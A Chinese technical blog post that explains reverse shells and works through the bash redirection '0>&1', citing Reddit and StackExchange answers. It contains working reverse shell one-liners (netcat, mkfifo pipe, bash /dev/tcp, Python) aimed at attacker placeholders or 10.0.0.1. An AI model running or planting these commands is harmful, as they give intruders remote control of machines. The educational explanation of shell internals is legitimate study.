【讨论】反弹shell命令里的0>&1到底是个什么玩意?

已于 2024-02-14 23:07:15 修改
阅读量840 收藏 10
点赞数 6
分类专栏: linux真他妈难啊 文章标签: linux bash 运维 网络安全
于 2023-03-13 15:45:45 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/DumplingY/article/details/128877092
版权

1.反弹shell的定义

反弹shell在实现上与正向shell相反。
正向shell指的是攻击者主动发起连接以访问靶机的shell,而反弹shell是受害机主动发起连接,攻击方只需监听就能拿到它的shell。反弹shell通常用于攻击者无法直接访问受害机的情况(如内网机器)。

2.linux重定向的概念

linux重定向是实现反弹shell的核心,因此我们先来了解一下linux重定向的基本概念。百度百科里写的还挺全乎的,我就直接复制了。

Linux重定向是指修改原来默认的一些东西,对原来系统命令的默认执行方式进行改变,比如说简单的我不想看到在显示器的输出而是希望输出到某一文件中就可以通过Linux重定向来进行这项工作。

a、 I/O重定向通常与 FD(文件描述符,本质上是一个数组索引,指向其对应的文件)有关,shell的FD通常为10个,即 0~9;
b、 常用FD有3个,为0(stdin,标准输入)、1(stdout,标准输出)、2(stderr,标准错误输出),默认与keyboard、monitor有关;
c、 用 < 来改变读进的数据信道(stdin),使之从指定的档案读进;
d、 用 > 来改变送出的数据信道(stdout, stderr),使之输出到指定的档案;
e、 0 是 < 的默认值,因此 < 与 0<是一样的;同理,> 与 1> 是一样的
f、 在IO重定向 中,stdout 与 stderr 的管道会先准备好,才会从 stdin 读进资料;
g、 管道“|”(pipe line):上一个命令的 stdout 接到下一个命令的 stdin;
h、 tee 命令是在不影响原本 I/O 的情况下,将 stdout 复制一份到档案去;
i、 bash(ksh)执行命令的过程:分析命令-变量求值-命令替代(``和$( ))-重定向-通配符展开-确定路径-执行命令;
j、 ( ) 将 command group 置于 sub-shell 去执行,也称 nested sub-shell,它有一点非常重要的特性是:继承父shell的标准输入、标准输出、标准错误和任何其他打开的文件描述符。
k、 exec 命令:常用来替代当前 shell 并重新启动一个 shell,换句话说,并没有启动子 shell。使用这一命令时任何现有环境都将会被清除。exec 在对文件描述符进行操作的时候,也只有在这时,exec 不会覆盖你当前的 shell 环境。

关于重定向命令,更详细的可以参考GNU官方文档

3.反弹shell的三种常用方法

攻击者(监听方)用nc简单监听即可:

nc -lvp <LPORT>

受害者需要把自己的shell反弹出去,即让远程攻击方具有对shell进行读写的能力。目前看到的方法有如下几种[1]:

  1. netcat
nc -e /bin/sh <LHOST> <LPORT>
  1. netcat without -e
    在较新的linux上,netcat的GAPING_SECURITY_HOLE选项是disabled,这意味着netcat没有-e选项,无法用来取得客户端的bash。可以使用以下命令:
mkfifo /tmp/p; nc <LHOST> <LPORT> 0</tmp/p | /bin/sh > /tmp/p 2>&1; rm /tmp/p

在这里,首先使用mkfifo命令创建了一个文件名为p的命名管道 (即FIFO)。这个 FIFO 将用于将数据传送回 shell 输入。

  1. bash
    泛用性最广的一种,也是本文讨论的对象
bash -c 'sh -i >& /dev/tcp/<LHOST>/<LPORT> 0>&1'

或者

bash -i >& /dev/tcp/<LHOST>/<LPORT> 0>&1
  1. python
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<LHOST>",<LPORT>));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

4.问题讨论

对于任何一条linux菜狗而言,在人生第一次看见bash -i >& /dev/tcp/<LHOST>/<LPORT> 0>&1这条命令的时候,十有八九都会两眼一黑。尽管花了很长时间查资料,但到最后我可能还是没有彻底弄清楚这条命令实现的原理。

这里仅记录一下我在这个过程中的思考和曾经踩过的误区,日后可能还会更新(希望我能搞懂),如有错误欢迎指正。

1.从一个>开始

我们把这条指令拆解一下,从简单的研究起。
在攻击者机器上进行监听,然后在受害者机器上执行下列命令,会发生什么?

bash -i > /dev/tcp/<LHOST>/<LPORT>

答:前面说过,>等价于1>,也就是说靶机的输出(1)被写到攻击者的机器上(/dev/tcp/<LHOST>/<LPORT>),因此攻击者能够监听到在受害者机器的shell上执行的所有命令的结果,但他自己无法执行命令。

2.有关重定向的理解误区

在第一步的基础上,为什么在这个命令最后加上一个’0>&1’(如下所示)之后,就能把攻击者输入的命令回传到受害者机上并执行?

bash -i > /dev/tcp/<LHOST>/<LPORT> 0>&1

网上常见的一种说法是:“0>&1的意思是将标准输入重定向到标准输出中,也就是说在攻击者主机上的输入会显示在目标主机的shell中但是输出还是重定向到了攻击者主机上”

此时的我一来没搞懂重定向的主被动关系,二来一厢情愿地以为0>&1是标准输入被复制到标准输出的意思,所以死活看不懂这段话到底是什么个意思。

这时一个reddit问答[2]拯救了我:

Users tend to read “0>&1” as “redirect file descriptor 0 to fd 1” or “redirect stdin to stdout”. But that’s implemented in C by using dup2() to create a copy of fd 1, and replacing fd 0.【用户倾向于把“0>&1”读作是“把文件描述符0重定向到文件描述符1”或者“将标准输入重定向到标准输出”,但是在C中这句话的实现方法是用dup2()创建一个fd1的拷贝来取代fd0.】

所以"0>&1"的本质是把文件描述符 fd1复制到 fd0(用赋值语句来表示的话,就是fd0:=fd1),即:写入fd1的东西同时也被写入了fd0,标准输出(1)被复制到标准输入(0)(等价于标准输入被重定向到标准输出,这两个表述是反过来的)。

引用先知一篇文章[4]里面对重定向符号的解释可能会更清晰一些:

格式: [n]<&[m] / [n]>&[m] (这里所有字符之间不要有空格)
说明:
1)这里两个都是将文件描述符 m 复制到 n ,两者的区别是,前者是以只读的形式打开,后者是以只写的形式打开
因此 0<&1 和 0>&1 是完全等价的(读/写方式打开对其没有任何影响)
2)这里的& 目的是为了区分数字名字的文件和文件描述符,如果没有& 系统会认为是将文件描述符重定向到了一个数字作为文件名的文件,而不是一个文件描述符

关于这个万恶又误导人的箭头朝向问题,stackexchange的一个回答[3]说得很好:

0>&1 (same as 0<&1 or <&1) adds 0 (stdin) to the list. It duplicates fd 1 to 0 as well (fd 0 is made to point to the same resource as pointed to by fd 1).

“0>&1”,“0<&1”,还有"<&1",其实是完全相同的,考虑到文件描述符复制的方向,"0<&1"这种写法其实更符合语义,也不容易让人产生误解。

3.> 和 >&有什么区别?

bash -i >& /dev/tcp/<LHOST>/<LPORT> 0>&1这句当中,第一个’>&'表示混合输出,即标准输出1 + 错误输出2。而"0>&1"中的&是为了区分文件1和文件描述符1的。

还是放上先知那篇文章里给出的对标准输出与标准错误输出重定向的解释:

格式: &> word >& word

说明:将标准输出与标准错误输出都定向到word代表的文件(以写的方式打开),两种格式意义完全相同,这种格式完全等价于 > word 2>&1(2>&1 是将标准错误输出复制到标准输出)

最终,对于bash -i >& /dev/tcp/<LHOST>/<LPORT> 0>&1,处理此命令的 shell 将执行以下行为:

  • fork
  • 创建TCP连接请求到攻击机
  • 把结果文件复制到fd1
  • 把结果文件复制到fd2
  • 把fd1复制到fd0
  • 使用"bash -i"创建子进程

总而言之,攻击者的输入变成了受害者机的标准输入这个过程至此算是明晰了:攻击者的输入写进受害者机的/dev/tcp/<LHOST>/<LPORT>文件里,于是被复制到了标准输入(0)当中,作为命令执行,而命令的标准输出(1)和错误输出(2)又被重定向回/dev/tcp/<LHOST>/<LPORT>,传回攻击机。

更简单地说,我们把fd0,1和2都指向了/dev/tcp/<LHOST>/<LPORT>,当bash -i读取其标准输入时,它从套接字读取,即从位于另一端的任何内容读取,当它(或从那里运行的任何命令)对fd1或2进行写入时,它通过该套接字发送到另一端。

4.有关文件读写权限的思考

bash -i > /dev/tcp/<LHOST>/<LPORT>这个命令里,bash创建的这个TCP套接字应该是只写(即只能客户机向攻击机发送消息)的,但为什么只加了这个"0>&1",客户机就能够接收到攻击机的命令并执行呢?

网上给出的解答是这样的:

bash创建一个 TCP 套接字并将其连接到host:port. 那不是只写重定向,而是读+写网络套接字。

Bash 实际上不会关闭套接字文件描述符的读取端,即使该套接字是使用>.
如果我这样做,为了清楚起见,我会使用<>它,因为这更明显地创建了一个可读和可写的文件描述符。

<>的作用是以读写方式打开一个文件描述符 ,默认文件描述符为0,即等价于’0<>'。
所以更标准的反弹shell写法应该是这样:

bash -i 1<> /dev/tcp/<LHOST>/<LPORT> 2>&1 0>&1

不过GNU官网也没有对读写权限这块做详细说明,所以对于重定向时什么时候只读什么时候只写,我还是有点迷迷糊糊的。以后再说罢。

5.参考

1.cocomelonc: Reverse shells
2.reddit: Understanding “0>&1” in a bash reverse shell
3.stackexchange: What does the 0>&1 shell redirection mean?
4.Linux反弹shell(一)文件描述符与重定向【👈写得非常好!推荐阅读!】

DumplingY
关注
  • 6
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
Linux反弹shell总结与实践
不想当脚本小子的脚本小子
12-05 248
最近在学习的时候碰到了利用kali写反弹shell的操作,趁着有空的时候过来系统学习一下。给1.什么情况下需要写入反弹shell。2.如何写入反弹shell 3.反弹shell成功的原理是什么 4.反弹shell有没有什么变形。5.反弹shell有哪些方法? 当我去攻击一台机器的时候,通过该机器的端口以及端口提供的服务(SSH、telnet等等)可以直接去连接到这台机器,但是如果连不上这台机器那就不如让它弹一个shell回来(可以理解为从对方的机器上拿一个控制权到自己手),比如这个机器在内网,...
Linux下NC反弹shell命令(推荐)
09-15
主要介绍了Linux下NC反弹shell命令,非常不错,具有参考借鉴价值,需要的的朋友参考下吧
详解shell中/dev/null 2&1到底是什么
01-10
前言 相信大家经常能在shell脚本中发现>/dev/null 2>&1这样的语句。以前的我并没有去深入地理解这段命令的作用,照搬照用,直到上周我将这段命令不小心写成了2>&1 >/dev/null,出了一点小问题之后,我才开始去了解这段命令背后的“玄机”。 shell重定向介绍 就像我们平时写的程序一样,一段程序会处理外部的输入,然后将运算结果输出到指定的位置。在交互式的程序中,输入来自用户的键盘和鼠标,结果输出到用户的屏幕,甚至播放设备中。而对于某些后台运行的程序,输入可能来自于外部的一些文件,运算的结果通常又写到其他的文件中。而且程序在运行的过程中,会有一些关键性的信息,比如异常堆栈,外
shell命令中ls ..是什么意思?
03-31
"ls .." 是一个Shell命令,用于在当前目录的上级目录中列出文件和目录的名称。
详解shell中>/dev/null 2>&1到底是什么
09-15
主要介绍了shell中>/dev/null 2>&1到底是什么,文中介绍的很详细,需要的朋友可以参考借鉴,下面来一起看看吧。
shell启动脚本中的0、1、2、>和&解析
热门推荐
l1394049664的博客
08-15 1万+
目录 一、0 1 2 文件描述符 二、&gt;是重定向符,就是把前面输出的内容重定向到后面指定的位置 三、&amp; 是一个描述符,如果1或2前不加&amp;,会被当成一个普通文件 nohup sh gmv.sh &gt;ls.txt 2&gt;&amp;1 &amp;  后台运行脚本的一般格式,并且把日志(正常日志和错误日志)输出到ls.txt中 tail -f ls.txt可以动态查...
谈谈常用Reverse shell,以及他们是怎么做到的。
TA不懒,但还没有添加简介
05-02 829
谈谈常用Reverse shell,以及他们是怎么做到的。
Linux渗透之反弹Shell命令解析
deeplearnings的博客
08-18 9837
前言 当我们在渗透Linux主机时,反弹一个交互的shell是非常有必要的。在搜索引擎上搜索关键字“Linux 反弹shell”,会出现一大堆相关文章,但是其内容不但雷同,而且都仅仅是告诉我们执行这个命令就可以反弹shell了,却没有一篇文章介绍这些命令究竟是如何实现反弹shell的。既然大牛们懒得科普,那我就只好自己动手了。本文就来探讨一下相关命令实现的原理。 B
Linux 的文件描述符 0,1,2, 2&1 究竟是什么
papaya的博客
01-07 497
通过上面的分析,对于command>a 2>&1这条命令,等价于command 1>a 2>&1可以理解为执行 command 产生的标准输入重定向到文件 a 中,标准错误也重定向到文件 a 中。我们可以理解为,左边是标准输出,好,现在标准输出直接输入到/dev/null中,而2>&1是将标准错误重定向到标准输出,所以当程序产生错误的时候,相当于错误流向左边,而左边依旧是输入到/dev/null中。2>1的作用是把标准错误的输出重定向到1,但这个1不是标准输出,而是一个文件!
Unix中 &0 &1 &2 $# 啥意思
liujinwei2005的专栏
02-20 3987
经常关注linux脚本的人,一定看到过 2>&1 这样的用法,最初一定不明白其中的含义以及为什么是这样的一种组合。昨天偶然间再次看到了这个 2>&1 的写法,遂下决心搞明白其中的含义。     其实要弄清楚 2>&1 的含义,首先应当知道linux中有三种标准输入输出,分别是STDIN,STDOUT,STDERR,对应的数字是0,1,2。STDIN就是标准输入,默认从键盘读取信息;STDOUT是
linux shell 中 2&1的含义
09-15
对于&1 更准确的说应该是文件描述符 1,而1 一般代表的就是STDOUT_FILENO,实际上这个操作就是一个dup2(2)调用
C语言 0>>1是什么意思,C语言 1 << 0 是什么意思
weixin_31282459的博客
05-19 2668
满意答案1 << 0 是把1 按2进制 左移0位,结果还是 1 ,2进制 0000 00011 << 1, 是把1 按2进制 左移1位,结果是2,2进制 0000 0010-------------------------------------------enum{GTK_ACCEL_VISIBLE = 1 << 0,GTK_ACCEL_LOCKED = 1 ...
Linux中的数据重定向(<与<<与&1)
浅时光|初如梦
07-14 792
1.概述 数据重定向就是将某个命令执行后应该要出现在屏幕上的数据, 给他传输到其他的地方,通常执行一条命令的时候会有标准输出和标准错误输出 2.标准输出和标准错误输出 标准输出是指命令执行之后,传回正确信息的输出目标 如执行 ll /home 标准错误输出是命令执行失败后,所传回错误信息的输出目标 标准输入(stdin):编号为0 使用<或<< 标准输出(stdout):编号为1 使用>或&gt...
linux 反弹脚本,linux反弹shell的原理详解
weixin_36219012的博客
04-30 281
完整命令反弹shell命令bash -i >& /dev/tcp/10.0.0.1/8080 0>&1bash -i > /dev/tcp/ip/port 0>&1 2>&1利用nc反弹shell:nc -lvvp 12345 -t -e /bin/bash原理bash -i > /dev/tcp/ip/port 0>&a...
linux命令Linux shell中 2&1的含义解释(标准输入输出)及nohup后台启动
m0_45406092的博客
02-03 1万+
文章目录1. 首先了解下1和2在Linux中代表什么1.1 重定向1.2 标准操作符1.3 关于2 >& 1的含义1.3.1 把标准输出和标准错误输出分别指定到不同的文件中1.3.2 把标准输出和标准错误输出指定到同一个文件中 1. 首先了解下1和2在Linux中代表什么 在Linux系统中0 1 2是一个文件描述符: 上面的操作符可以理解成重定向符 1.1 重定向 什么是重定向?我们先来看下不重定向,也就是默认输出: echo "hello" 默认的输出就是输出到屏幕上,那么通过重
exec 1>&0
luooofan的博客
02-02 3106
最近在做hgame2020-pwn的一道题中,官方wp给出了一条linux命令是exec 1>&0,不解其意,直接查找也找不到这条命令到底是干什么的,拐弯抹角地先了解了文件描述符,然后才了解了这条命令。 程序的原意是输入一个字符串s1,经过字符检查后执行如下三条语句: close(1);close(2);system(&s1); 我们的目的是要得到shell,官方wp给...
Linux中0、1、2的含义解释及使用方法讲解
yyyuyangbo的博客
06-09 5108
版权声明:本文为CSDN博主「一个行走的民」的原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接及本声明。 原文链接:https://blog.csdn.net/zhaominpro/article/details/82630528 ———————————————————————————————————————————————————————— A.首先了解下1和2在Linux中代表什么 在Linux系统中0 1 2是一个文件描述符 名称 代码 操作符 J...
linux 渗透 反弹shell,【技术分享】Linux渗透之反弹Shell命令解析
weixin_26814683的博客
05-13 243
前言当我们在渗透Linux主机时,反弹一个交互的shell是非常有必要的。在搜索引擎上搜索关键字“Linux 反弹shell”,会出现一大堆相关文章,但是其内容不但雷同,而且都仅仅是告诉我们执行这个命令就可以反弹shell了,却没有一篇文章介绍这些命令究竟是如何实现反弹shell的。既然大牛们懒得科普,那我就只好自己动手了。本文就来探讨一下相关命令实现的原理。Bash这篇文章的起因就是网上给的Ba...
shell命令学习1:&1和&2的含义
qq_19298665的博客
04-04 1637
加粗样式shell命令学习1:>&1和>&2的含义 在 shell 程式中,最常使用的 FD (file descriptor) 大概有三个, 分别是: 0 是一个文件描述符,表示标准输入(stdin) 1 是一个文件描述符,表示标准输出(stdout) 2 是一个文件描述符,表示标准错误(stderr) 在标准情况下, 这些FD分别跟如下设备关联: stdin(0): keyboard 键盘输入,并返回在前端 stdout(1): monitor 正确返回值 输出到前端 std
这个shell命令是什么意思command >/dev/null 2>&1 &
最新发布
05-26
这个命令是将一个命令放到后台运行,并将它的所有输出都重定向到/dev/null,也就是说不输出任何内容。具体含义如下: - command:要执行的命令。 - >/dev/null:将标准输出重定向到/dev/null,也就是不输出任何内容。 - 2>&1:将标准错误输出重定向到标准输出,也就是和标准输出一样重定向到/dev/null。 - &:将命令放到后台运行,不会阻塞当前 shell。 总的来说,这个命令的作用是将一个命令放到后台运行,同时不输出任何内容,也不会阻塞当前 shell。常用于在启动脚本中后台运行一些服务程序或者定时任务。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值